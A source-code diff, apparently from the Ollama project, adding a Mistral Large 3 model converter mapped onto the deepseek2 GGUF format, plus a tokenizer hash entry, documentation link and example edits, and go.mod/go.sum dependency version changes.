RoutedScale float32 `json:"routed_scale"`
ExpertHiddenDim uint32 `json:"expert_hidden_dim"`
NumSharedExperts uint32 `json:"num_shared_experts"`
} `json:"moe"`
// Vision encoder configuration
VisionEncoder struct {
ImageTokenID uint32 `json:"image_token_id"`
ImageBreakTokenID uint32 `json:"image_break_token_id"`
ImageEndTokenID uint32 `json:"image_end_token_id"`
IntermediateSize uint32 `json:"intermediate_size"`
NumHiddenLayers uint32 `json:"num_hidden_layers"`
NumAttentionHeads uint32 `json:"num_attention_heads"`
MMProjectorID string `json:"mm_projector_id"`
SpatialMergeSize uint32 `json:"spatial_merge_size"`
HiddenSize uint32 `json:"hidden_size"`
NumChannels uint32 `json:"num_channels"`
ImageSize uint32 `json:"image_size"`
MaxImageSize uint32 `json:"max_image_size"`
PatchSize uint32 `json:"patch_size"`
RopeTheta float32 `json:"rope_theta"`
AddPreMMProjectorLayerNorm bool `json:"add_pre_mm_projector_layer_norm"`
AdapterBias bool `json:"adapter_bias"`
} `json:"vision_encoder"`
}
func (p *mistralLarge3Model) KV(t *Tokenizer) ggml.KV {
kv := p.ModelParameters.KV(t)
kv["general.architecture"] = "deepseek2" // Use deepseek2 architecture for runtime compatibility
kv["general.type"] = "model"
// Basic model parameters (using deepseek2 keys for compatibility)
kv["deepseek2.vocab_size"] = p.VocabSize
kv["deepseek2.block_count"] = p.NumLayers
kv["deepseek2.context_length"] = cmp.Or(p.MaxPosEmbed, p.MaxSeqLen)
kv["deepseek2.embedding_length"] = p.Dim
kv["deepseek2.feed_forward_length"] = p.HiddenDim
// Attention configuration
kv["deepseek2.attention.head_count"] = p.NumHeads
kv["deepseek2.attention.head_count_kv"] = p.NumKVHeads
kv["deepseek2.attention.layer_norm_rms_epsilon"] = p.NormEps
kv["deepseek2.attention.key_length"] = p.QKNopeHeadDim + p.QKRopeHeadDim
kv["deepseek2.attention.value_length"] = p.VHeadDim
// LoRA attention parameters
kv["deepseek2.attention.q_lora_rank"] = p.QLoraRank
kv["deepseek2.attention.kv_lora_rank"] = p.KVLoraRank
// ROPE configuration
kv["deepseek2.rope.dimension_count"] = p.QKRopeHeadDim
kv["deepseek2.rope.freq_base"] = cmp.Or(p.RopeTheta, 10000.0)
// ROPE scaling - map to deepseek2 format
if p.Yarn.OrigMaxPosEmbed > 0 {
kv["deepseek2.rope.scaling.factor"] = p.Yarn.Factor
kv["deepseek2.rope.scaling.original_context_length"] = p.Yarn.OrigMaxPosEmbed
kv["deepseek2.rope.scaling.type"] = "yarn"
kv["deepseek2.rope.scaling.yarn_log_multiplier"] = float32(0.1) // mscale_all_dim * 0.1 as in llama.cpp
}
// MOE configuration
if p.MOE.NumExperts > 0 {
kv["deepseek2.expert_count"] = p.MOE.NumExperts
kv["deepseek2.expert_used_count"] = p.MOE.NumExpertsPerTok
kv["deepseek2.expert_shared_count"] = p.MOE.NumSharedExperts
kv["deepseek2.expert_feed_forward_length"] = p.MOE.ExpertHiddenDim
kv["deepseek2.expert_weights_scale"] = p.MOE.RoutedScale
kv["deepseek2.leading_dense_block_count"] = p.MOE.FirstKDenseReplace
kv["deepseek2.expert_weights_norm"] = true
kv["deepseek2.expert_gating_func"] = uint32(1) // softmax
}
// Vision encoder configuration (if supported by deepseek2 runtime)
if p.VisionEncoder.HiddenSize > 0 {
kv["deepseek2.vision.block_count"] = p.VisionEncoder.NumHiddenLayers
kv["deepseek2.vision.embedding_length"] = p.VisionEncoder.HiddenSize
kv["deepseek2.vision.feed_forward_length"] = p.VisionEncoder.IntermediateSize
kv["deepseek2.vision.attention.head_count"] = p.VisionEncoder.NumAttentionHeads
kv["deepseek2.vision.image_size"] = p.VisionEncoder.ImageSize
kv["deepseek2.vision.patch_size"] = p.VisionEncoder.PatchSize
kv["deepseek2.vision.num_channels"] = p.VisionEncoder.NumChannels
// Multimodal configuration
kv["deepseek2.image_token_id"] = p.VisionEncoder.ImageTokenID
kv["deepseek2.image_break_token_id"] = p.VisionEncoder.ImageBreakTokenID
kv["deepseek2.image_end_token_id"] = p.VisionEncoder.ImageEndTokenID
kv["deepseek2.spatial_merge_size"] = p.VisionEncoder.SpatialMergeSize
}
// Set tokenizer type - use tekken preprocessing (now supported!)
kv["tokenizer.ggml.pre"] = "tekken"
return kv
}
func (p *mistralLarge3Model) specialTokenTypes() []string {
return []string{
"bos", "eos", "unk", "sep", "pad", "cls", "mask",
}
}
func (p *mistralLarge3Model) Replacements() []string {
return []string{
"lm_head", "output",
"tok_embeddings", "token_embd", // Mistral Large uses tok_embeddings instead of model.embed_tokens
"norm", "output_norm",
"language_model.", "",
"layers", "blk", // Mistral 3 Large uses "layers" instead of "model.layers"
"attention_norm", "attn_norm",
// LoRA attention mappings (Mistral 3 Large style)
"attention.wkv_a_with_mqa", "attn_kv_a_mqa",
"attention.kv_a_norm", "attn_kv_a_norm",
"attention.wkv_b", "attn_kv_b",
"attention.wq_a", "attn_q_a",
"attention.q_a_norm", "attn_q_a_norm",
"attention.wq_b", "attn_q_b",
"attention.wo", "attn_output",
"ffn_norm", "ffn_norm", // Keep ffn_norm as is
// MOE mappings for Mistral 3 Large
"shared_experts.w2", "ffn_down_shexp",
"shared_experts.w1", "ffn_gate_shexp",
"shared_experts.w3", "ffn_up_shexp",
"experts.*.w1", "ffn_gate_exps", // Will be merged in Tensors()
"experts.*.w2", "ffn_down_exps", // Will be merged in Tensors()
"experts.*.w3", "ffn_up_exps", // Will be merged in Tensors()
"gate", "ffn_gate_inp",
// Standard feed forward mappings (for non-MOE layers)
"feed_forward.w1", "ffn_gate",
"feed_forward.w2", "ffn_down",
"feed_forward.w3", "ffn_up",
// Mistral-specific tensor renaming
".qscale_act", ".input_scale",
".qscale_weight", ".weight_scale",
// Vision encoder mappings - do we even need this?
"vision_tower", "v",
"ln_pre", "encoder_norm",
"attention.q_proj", "attn_q",
"attention.k_proj", "attn_k",
"attention.v_proj", "attn_v",
"attention.o_proj", "attn_output",
"attention_norm", "attn_norm",
"feed_forward.gate_proj", "ffn_gate",
"feed_forward.down_proj", "ffn_down",
"feed_forward.up_proj", "ffn_up",
"multi_modal_projector", "mm",
"patch_merger.merging_layer", "mm.patch_merger",
"pre_mm_projector_norm", "mm.pre_norm",
"vision_language_adapter.w_in", "mm.w_in",
"vision_language_adapter.w_out", "mm.w_out",
}
}
func (p *mistralLarge3Model) Tensors(s []Tensor) (out []*ggml.Tensor) {
// Create merges for MOE expert tensors
if p.MOE.NumExperts > 0 {
merges := make([]merge, p.NumLayers*3)
for i := range p.NumLayers {
merges[i*3+0] = merge{
fmt.Sprintf("blk.%d.experts.*.w1.weight", i),
fmt.Sprintf("blk.%d.ffn_gate_exps.weight", i),
}
merges[i*3+1] = merge{
fmt.Sprintf("blk.%d.experts.*.w3.weight", i),
fmt.Sprintf("blk.%d.ffn_up_exps.weight", i),
}
merges[i*3+2] = merge{
fmt.Sprintf("blk.%d.experts.*.w2.weight", i),
fmt.Sprintf("blk.%d.ffn_down_exps.weight", i),
}
}
out, s = mergeTensors(s, merges...)
}
skipLayer := func(n string, minValue uint32) bool {
re := regexp.MustCompile(`^blk\.(\d+)`)
matches := re.FindStringSubmatch(n)
if matches == nil {
return false
}
blkNum, err := strconv.Atoi(matches[1])
if err != nil {
return false
}
return uint32(blkNum) >= minValue
}
// Function to check if tensor should be skipped (vision components)
skipVisionTensor := func(name string) bool {
return strings.HasPrefix(name, "vision_") ||
strings.HasPrefix(name, "patch_merger.") ||
strings.Contains(name, "mm_projector")
}
for _, t := range s {
name := t.Name()
// Skip vision tensors (handled separately or not needed)
if skipVisionTensor(name) {
slog.Debug("skipping vision tensor", "name", name)
continue
}
// Skip any additional layers beyond expected count
if skipLayer(name, p.NumLayers) {
slog.Debug("skipping extra layer", "name", name)
continue
}
out = append(out, &ggml.Tensor{
Name: name,
Kind: t.Kind(),
Shape: t.Shape(),
WriterTo: t,
})
}
return out
}

View File

@ -101,6 +101,8 @@ func parseTokenizer(fsys fs.FS, specialTokenTypes []string) (*Tokenizer, error)
t.Pre = "deepseek-coder" t.Pre = "deepseek-coder"
case "1ff7f41064896984db5d1bb6ff64fa4bc29007d08c1b439e505b7392777a319e": case "1ff7f41064896984db5d1bb6ff64fa4bc29007d08c1b439e505b7392777a319e":
t.Pre = "qwen2" t.Pre = "qwen2"
case "1d64a9a8eaf9f1bd80331984d81fdd514e7feafe8df83a525dd31472f275699a":
t.Pre = "tekken"
case "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855": case "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855":
// noop, empty pretokenizer // noop, empty pretokenizer
default: default:

View File

@ -49,8 +49,7 @@ func parseSentencePiece(fsys fs.FS) (*Vocabulary, error) {
tt := int32(sentencepiece.ModelProto_SentencePiece_NORMAL) tt := int32(sentencepiece.ModelProto_SentencePiece_NORMAL)
// temporary fix to handle gemma3 broken configs // temporary fix to handle gemma3 broken configs
// TODO(parthsareen): allow reading of tokenizer.json to allow managing special tokens when using spm if slices.Contains([]string{"<end_of_turn>", "<start_of_turn>"}, piece.GetPiece()) {
if slices.Contains([]string{"<end_of_turn>", "<start_of_turn>", "<start_function_declaration>", "<end_function_declaration>", "<start_function_call>", "<end_function_call>", "<start_function_response>", "<end_function_response>", "<escape>"}, piece.GetPiece()) {
tt = int32(sentencepiece.ModelProto_SentencePiece_CONTROL) tt = int32(sentencepiece.ModelProto_SentencePiece_CONTROL)
} }

View File

@ -895,11 +895,11 @@ curl http://localhost:11434/api/chat -d '{
"tool_calls": [ "tool_calls": [
{ {
"function": { "function": {
"name": "get_weather", "name": "get_temperature",
"arguments": { "arguments": {
"city": "Toronto" "city": "Toronto"
} }
} },
} }
] ]
}, },
@ -907,7 +907,7 @@ curl http://localhost:11434/api/chat -d '{
{ {
"role": "tool", "role": "tool",
"content": "11 degrees celsius", "content": "11 degrees celsius",
"tool_name": "get_weather" "tool_name": "get_temperature",
} }
], ],
"stream": false, "stream": false,

View File

@ -277,8 +277,6 @@ curl -X POST http://localhost:11434/v1/chat/completions \
### `/v1/responses` ### `/v1/responses`
> Note: Added in Ollama v0.13.3
Ollama supports the [OpenAI Responses API](https://platform.openai.com/docs/api-reference/responses). Only the non-stateful flavor is supported (i.e., there is no `previous_response_id` or `conversation` support). Ollama supports the [OpenAI Responses API](https://platform.openai.com/docs/api-reference/responses). Only the non-stateful flavor is supported (i.e., there is no `previous_response_id` or `conversation` support).
#### Supported features #### Supported features

View File

@ -36,6 +36,7 @@ Provide an `images` array. SDKs accept file paths, URLs or raw bytes while the R
}], }],
"stream": false "stream": false
}' }'
"
``` ```
</Tab> </Tab>
<Tab title="Python"> <Tab title="Python">

View File

@ -14,11 +14,11 @@ curl -fsSL https://ollama.com/install.sh | sh
## How can I view the logs? ## How can I view the logs?
Review the [Troubleshooting](./troubleshooting) docs for more about using logs. Review the [Troubleshooting](./troubleshooting.md) docs for more about using logs.
## Is my GPU compatible with Ollama? ## Is my GPU compatible with Ollama?
Please refer to the [GPU docs](./gpu). Please refer to the [GPU docs](./gpu.md).
## How can I specify the context window size? ## How can I specify the context window size?

View File

@ -33,7 +33,7 @@ Check your compute compatibility to see if your card is supported:
| 5.0 | GeForce GTX | `GTX 750 Ti` `GTX 750` `NVS 810` | | 5.0 | GeForce GTX | `GTX 750 Ti` `GTX 750` `NVS 810` |
| | Quadro | `K2200` `K1200` `K620` `M1200` `M520` `M5000M` `M4000M` `M3000M` `M2000M` `M1000M` `K620M` `M600M` `M500M` | | | Quadro | `K2200` `K1200` `K620` `M1200` `M520` `M5000M` `M4000M` `M3000M` `M2000M` `M1000M` `K620M` `M600M` `M500M` |
For building locally to support older GPUs, see [developer](./development#linux-cuda-nvidia) For building locally to support older GPUs, see [developer.md](./development.md#linux-cuda-nvidia)
### GPU Selection ### GPU Selection
@ -54,7 +54,7 @@ sudo modprobe nvidia_uvm`
Ollama supports the following AMD GPUs via the ROCm library: Ollama supports the following AMD GPUs via the ROCm library:
> **NOTE:** > [!NOTE]
> Additional AMD GPU support is provided by the Vulkan Library - see below. > Additional AMD GPU support is provided by the Vulkan Library - see below.
@ -132,9 +132,9 @@ Ollama supports GPU acceleration on Apple devices via the Metal API.
## Vulkan GPU Support ## Vulkan GPU Support
> **NOTE:** > [!NOTE]
> Vulkan is currently an Experimental feature. To enable, you must set OLLAMA_VULKAN=1 for the Ollama server as > Vulkan is currently an Experimental feature. To enable, you must set OLLAMA_VULKAN=1 for the Ollama server as
described in the [FAQ](faq#how-do-i-configure-ollama-server) described in the [FAQ](faq.md#how-do-i-configure-ollama-server)
Additional GPU support on Windows and Linux is provided via Additional GPU support on Windows and Linux is provided via
[Vulkan](https://www.vulkan.org/). On Windows most GPU vendors drivers come [Vulkan](https://www.vulkan.org/). On Windows most GPU vendors drivers come
@ -161,6 +161,6 @@ sudo setcap cap_perfmon+ep /usr/local/bin/ollama
To select specific Vulkan GPU(s), you can set the environment variable To select specific Vulkan GPU(s), you can set the environment variable
`GGML_VK_VISIBLE_DEVICES` to one or more numeric IDs on the Ollama server as `GGML_VK_VISIBLE_DEVICES` to one or more numeric IDs on the Ollama server as
described in the [FAQ](faq#how-do-i-configure-ollama-server). If you described in the [FAQ](faq.md#how-do-i-configure-ollama-server). If you
encounter any problems with Vulkan based GPUs, you can disable all Vulkan GPUs encounter any problems with Vulkan based GPUs, you can disable all Vulkan GPUs
by setting `GGML_VK_VISIBLE_DEVICES=-1` by setting `GGML_VK_VISIBLE_DEVICES=-1`

View File

@ -41,7 +41,6 @@ INSTRUCTION arguments
| [`ADAPTER`](#adapter) | Defines the (Q)LoRA adapters to apply to the model. | | [`ADAPTER`](#adapter) | Defines the (Q)LoRA adapters to apply to the model. |
| [`LICENSE`](#license) | Specifies the legal license. | | [`LICENSE`](#license) | Specifies the legal license. |
| [`MESSAGE`](#message) | Specify message history. | | [`MESSAGE`](#message) | Specify message history. |
| [`REQUIRES`](#requires) | Specify the minimum version of Ollama required by the model. |
## Examples ## Examples
@ -249,16 +248,6 @@ MESSAGE user Is Ontario in Canada?
MESSAGE assistant yes MESSAGE assistant yes
``` ```
### REQUIRES
The `REQUIRES` instruction allows you to specify the minimum version of Ollama required by the model.
```
REQUIRES <version>
```
The version should be a valid Ollama version (e.g. 0.14.0).
## Notes ## Notes
- the **`Modelfile` is not case sensitive**. In the examples, uppercase instructions are used to make it easier to distinguish it from arguments. - the **`Modelfile` is not case sensitive**. In the examples, uppercase instructions are used to make it easier to distinguish it from arguments.

View File

@ -87,7 +87,7 @@ When Ollama starts up, it takes inventory of the GPUs present in the system to d
### Linux NVIDIA Troubleshooting ### Linux NVIDIA Troubleshooting
If you are using a container to run Ollama, make sure you've set up the container runtime first as described in [docker](./docker) If you are using a container to run Ollama, make sure you've set up the container runtime first as described in [docker.md](./docker.md)
Sometimes the Ollama can have difficulties initializing the GPU. When you check the server logs, this can show up as various error codes, such as "3" (not initialized), "46" (device unavailable), "100" (no device), "999" (unknown), or others. The following troubleshooting techniques may help resolve the problem Sometimes the Ollama can have difficulties initializing the GPU. When you check the server logs, this can show up as various error codes, such as "3" (not initialized), "46" (device unavailable), "100" (no device), "999" (unknown), or others. The following troubleshooting techniques may help resolve the problem

19
go.mod
View File

@ -15,8 +15,8 @@ require (
github.com/spf13/cobra v1.7.0 github.com/spf13/cobra v1.7.0
github.com/stretchr/testify v1.9.0 github.com/stretchr/testify v1.9.0
github.com/x448/float16 v0.8.4 github.com/x448/float16 v0.8.4
golang.org/x/sync v0.17.0 golang.org/x/sync v0.12.0
golang.org/x/sys v0.37.0 golang.org/x/sys v0.36.0
) )
require ( require (
@ -28,17 +28,13 @@ require (
github.com/nlpodyssey/gopickle v0.3.0 github.com/nlpodyssey/gopickle v0.3.0
github.com/pdevine/tensor v0.0.0-20240510204454-f88f4562727c github.com/pdevine/tensor v0.0.0-20240510204454-f88f4562727c
github.com/tkrajina/typescriptify-golang-structs v0.2.0 github.com/tkrajina/typescriptify-golang-structs v0.2.0
github.com/wk8/go-ordered-map/v2 v2.1.8
golang.org/x/image v0.22.0 golang.org/x/image v0.22.0
golang.org/x/mod v0.30.0 golang.org/x/tools v0.30.0
golang.org/x/tools v0.38.0
gonum.org/v1/gonum v0.15.0 gonum.org/v1/gonum v0.15.0
) )
require ( require (
github.com/apache/arrow/go/arrow v0.0.0-20211112161151-bc219186db40 // indirect github.com/apache/arrow/go/arrow v0.0.0-20211112161151-bc219186db40 // indirect
github.com/bahlo/generic-list-go v0.2.0 // indirect
github.com/buger/jsonparser v1.1.1 // indirect
github.com/bytedance/sonic/loader v0.1.1 // indirect github.com/bytedance/sonic/loader v0.1.1 // indirect
github.com/chewxy/hm v1.0.0 // indirect github.com/chewxy/hm v1.0.0 // indirect
github.com/chewxy/math32 v1.11.0 // indirect github.com/chewxy/math32 v1.11.0 // indirect
@ -48,7 +44,6 @@ require (
github.com/gogo/protobuf v1.3.2 // indirect github.com/gogo/protobuf v1.3.2 // indirect
github.com/google/flatbuffers v24.3.25+incompatible // indirect github.com/google/flatbuffers v24.3.25+incompatible // indirect
github.com/kr/text v0.2.0 // indirect github.com/kr/text v0.2.0 // indirect
github.com/mailru/easyjson v0.7.7 // indirect
github.com/pkg/errors v0.9.1 // indirect github.com/pkg/errors v0.9.1 // indirect
github.com/pmezard/go-difflib v1.0.0 // indirect github.com/pmezard/go-difflib v1.0.0 // indirect
github.com/rivo/uniseg v0.2.0 // indirect github.com/rivo/uniseg v0.2.0 // indirect
@ -81,11 +76,11 @@ require (
github.com/twitchyliquid64/golang-asm v0.15.1 // indirect github.com/twitchyliquid64/golang-asm v0.15.1 // indirect
github.com/ugorji/go/codec v1.2.12 // indirect github.com/ugorji/go/codec v1.2.12 // indirect
golang.org/x/arch v0.8.0 // indirect golang.org/x/arch v0.8.0 // indirect
golang.org/x/crypto v0.43.0 golang.org/x/crypto v0.36.0
golang.org/x/exp v0.0.0-20250218142911-aa4b98e5adaa // indirect golang.org/x/exp v0.0.0-20250218142911-aa4b98e5adaa // indirect
golang.org/x/net v0.46.0 // indirect golang.org/x/net v0.38.0 // indirect
golang.org/x/term v0.36.0 golang.org/x/term v0.30.0
golang.org/x/text v0.30.0 golang.org/x/text v0.23.0
google.golang.org/protobuf v1.34.1 google.golang.org/protobuf v1.34.1
gopkg.in/yaml.v3 v3.0.1 // indirect gopkg.in/yaml.v3 v3.0.1 // indirect
) )

39
go.sum
View File

@ -14,11 +14,7 @@ github.com/apache/arrow/go/arrow v0.0.0-20211112161151-bc219186db40 h1:q4dksr6IC
github.com/apache/arrow/go/arrow v0.0.0-20211112161151-bc219186db40/go.mod h1:Q7yQnSMnLvcXlZ8RV+jwz/6y1rQTqbX6C82SndT52Zs= github.com/apache/arrow/go/arrow v0.0.0-20211112161151-bc219186db40/go.mod h1:Q7yQnSMnLvcXlZ8RV+jwz/6y1rQTqbX6C82SndT52Zs=
github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0 h1:jfIu9sQUG6Ig+0+Ap1h4unLjW6YQJpKZVmUzxsD4E/Q= github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0 h1:jfIu9sQUG6Ig+0+Ap1h4unLjW6YQJpKZVmUzxsD4E/Q=
github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0/go.mod h1:t2tdKJDJF9BV14lnkjHmOQgcvEKgtqs5a1N3LNdJhGE= github.com/arbovm/levenshtein v0.0.0-20160628152529-48b4e1c0c4d0/go.mod h1:t2tdKJDJF9BV14lnkjHmOQgcvEKgtqs5a1N3LNdJhGE=
github.com/bahlo/generic-list-go v0.2.0 h1:5sz/EEAK+ls5wF+NeqDpk5+iNdMDXrh3z3nPnH1Wvgk=
github.com/bahlo/generic-list-go v0.2.0/go.mod h1:2KvAjgMlE5NNynlg/5iLrrCCZ2+5xWbdbCW3pNTGyYg=
github.com/boombuler/barcode v1.0.0/go.mod h1:paBWMcWSl3LHKBqUq+rly7CNSldXjb2rDl3JlRe0mD8= github.com/boombuler/barcode v1.0.0/go.mod h1:paBWMcWSl3LHKBqUq+rly7CNSldXjb2rDl3JlRe0mD8=
github.com/buger/jsonparser v1.1.1 h1:2PnMjfWD7wBILjqQbt530v576A/cAbQvEW9gGIpYMUs=
github.com/buger/jsonparser v1.1.1/go.mod h1:6RYKKt7H4d4+iWqouImQ9R2FZql3VbhNgx27UK13J/0=
github.com/bytedance/sonic v1.11.6 h1:oUp34TzMlL+OY1OUWxHqsdkgC/Zfc85zGqw9siXjrc0= github.com/bytedance/sonic v1.11.6 h1:oUp34TzMlL+OY1OUWxHqsdkgC/Zfc85zGqw9siXjrc0=
github.com/bytedance/sonic v1.11.6/go.mod h1:LysEHSvpvDySVdC2f87zGWf6CIKJcAvqab1ZaiQtds4= github.com/bytedance/sonic v1.11.6/go.mod h1:LysEHSvpvDySVdC2f87zGWf6CIKJcAvqab1ZaiQtds4=
github.com/bytedance/sonic/loader v0.1.1 h1:c+e5Pt1k/cy5wMveRDyk2X4B9hF4g7an8N3zCYjJFNM= github.com/bytedance/sonic/loader v0.1.1 h1:c+e5Pt1k/cy5wMveRDyk2X4B9hF4g7an8N3zCYjJFNM=
@ -127,7 +123,6 @@ github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+
github.com/grpc-ecosystem/grpc-gateway v1.16.0/go.mod h1:BDjrQk3hbvj6Nolgz8mAMFbcEtjT1g+wF4CSlocrBnw= github.com/grpc-ecosystem/grpc-gateway v1.16.0/go.mod h1:BDjrQk3hbvj6Nolgz8mAMFbcEtjT1g+wF4CSlocrBnw=
github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8= github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8=
github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw= github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw=
github.com/josharian/intern v1.0.0/go.mod h1:5DoeVV0s6jJacbCEi61lwdGj/aVlrQvzHFFd8Hwg//Y=
github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM= github.com/json-iterator/go v1.1.12 h1:PV8peI4a0ysnczrg+LtxykD8LfKY9ML6u2jnxaEnrnM=
github.com/json-iterator/go v1.1.12/go.mod h1:e30LSqwooZae/UwlEbR2852Gd8hjQvJoHmT4TnhNGBo= github.com/json-iterator/go v1.1.12/go.mod h1:e30LSqwooZae/UwlEbR2852Gd8hjQvJoHmT4TnhNGBo=
github.com/jung-kurt/gofpdf v1.0.0/go.mod h1:7Id9E/uU8ce6rXgefFLlgrJj/GYY22cpxn+r32jIOes= github.com/jung-kurt/gofpdf v1.0.0/go.mod h1:7Id9E/uU8ce6rXgefFLlgrJj/GYY22cpxn+r32jIOes=
@ -148,8 +143,6 @@ github.com/ledongthuc/pdf v0.0.0-20250511090121-5959a4027728 h1:QwWKgMY28TAXaDl+
github.com/ledongthuc/pdf v0.0.0-20250511090121-5959a4027728/go.mod h1:1fEHWurg7pvf5SG6XNE5Q8UZmOwex51Mkx3SLhrW5B4= github.com/ledongthuc/pdf v0.0.0-20250511090121-5959a4027728/go.mod h1:1fEHWurg7pvf5SG6XNE5Q8UZmOwex51Mkx3SLhrW5B4=
github.com/leodido/go-urn v1.4.0 h1:WT9HwE9SGECu3lg4d/dIA+jxlljEa1/ffXKmRjqdmIQ= github.com/leodido/go-urn v1.4.0 h1:WT9HwE9SGECu3lg4d/dIA+jxlljEa1/ffXKmRjqdmIQ=
github.com/leodido/go-urn v1.4.0/go.mod h1:bvxc+MVxLKB4z00jd1z+Dvzr47oO32F/QSNjSBOlFxI= github.com/leodido/go-urn v1.4.0/go.mod h1:bvxc+MVxLKB4z00jd1z+Dvzr47oO32F/QSNjSBOlFxI=
github.com/mailru/easyjson v0.7.7 h1:UGYAvKxe3sBsEDzO8ZeWOSlIQfWFlxbzLZe7hwFURr0=
github.com/mailru/easyjson v0.7.7/go.mod h1:xzfreul335JAWq5oZzymOObrkdz5UnU4kGfJJLY9Nlc=
github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY= github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y= github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI= github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI=
@ -214,8 +207,6 @@ github.com/twitchyliquid64/golang-asm v0.15.1 h1:SU5vSMR7hnwNxj24w34ZyCi/FmDZTkS
github.com/twitchyliquid64/golang-asm v0.15.1/go.mod h1:a1lVb/DtPvCB8fslRZhAngC2+aY1QWCk3Cedj/Gdt08= github.com/twitchyliquid64/golang-asm v0.15.1/go.mod h1:a1lVb/DtPvCB8fslRZhAngC2+aY1QWCk3Cedj/Gdt08=
github.com/ugorji/go/codec v1.2.12 h1:9LC83zGrHhuUA9l16C9AHXAqEV/2wBQ4nkvumAE65EE= github.com/ugorji/go/codec v1.2.12 h1:9LC83zGrHhuUA9l16C9AHXAqEV/2wBQ4nkvumAE65EE=
github.com/ugorji/go/codec v1.2.12/go.mod h1:UNopzCgEMSXjBc6AOMqYvWC1ktqTAfzJZUZgYf6w6lg= github.com/ugorji/go/codec v1.2.12/go.mod h1:UNopzCgEMSXjBc6AOMqYvWC1ktqTAfzJZUZgYf6w6lg=
github.com/wk8/go-ordered-map/v2 v2.1.8 h1:5h/BUHu93oj4gIdvHHHGsScSTMijfx5PeYkE/fJgbpc=
github.com/wk8/go-ordered-map/v2 v2.1.8/go.mod h1:5nJHM5DyteebpVlHnWMV0rPz6Zp7+xBAnxjb1X5vnTw=
github.com/x448/float16 v0.8.4 h1:qLwI1I70+NjRFUR3zs1JPUCgaCXSh3SW62uAKT1mSBM= github.com/x448/float16 v0.8.4 h1:qLwI1I70+NjRFUR3zs1JPUCgaCXSh3SW62uAKT1mSBM=
github.com/x448/float16 v0.8.4/go.mod h1:14CWIYCyZA/cWjXOioeEpHeN/83MdbZDRQHoFcYsOfg= github.com/x448/float16 v0.8.4/go.mod h1:14CWIYCyZA/cWjXOioeEpHeN/83MdbZDRQHoFcYsOfg=
github.com/xtgo/set v1.0.0 h1:6BCNBRv3ORNDQ7fyoJXRv+tstJz3m1JVFQErfeZz2pY= github.com/xtgo/set v1.0.0 h1:6BCNBRv3ORNDQ7fyoJXRv+tstJz3m1JVFQErfeZz2pY=
@ -233,8 +224,8 @@ golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACk
golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= golang.org/x/crypto v0.0.0-20190510104115-cbcb75029529/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
golang.org/x/crypto v0.43.0 h1:dduJYIi3A3KOfdGOHX8AVZ/jGiyPa3IbBozJ5kNuE04= golang.org/x/crypto v0.36.0 h1:AnAEvhDddvBdpY+uR+MyHmuZzzNqXSe/GvuDeob5L34=
golang.org/x/crypto v0.43.0/go.mod h1:BFbav4mRNlXJL4wNeejLpWxB7wMbc79PdRGhWKncxR0= golang.org/x/crypto v0.36.0/go.mod h1:Y4J0ReaxCR1IMaabaSMugxJES1EpwhBHhv2bDHklZvc=
golang.org/x/exp v0.0.0-20180321215751-8460e604b9de/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20180321215751-8460e604b9de/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
golang.org/x/exp v0.0.0-20180807140117-3d87b88a115f/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20180807140117-3d87b88a115f/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
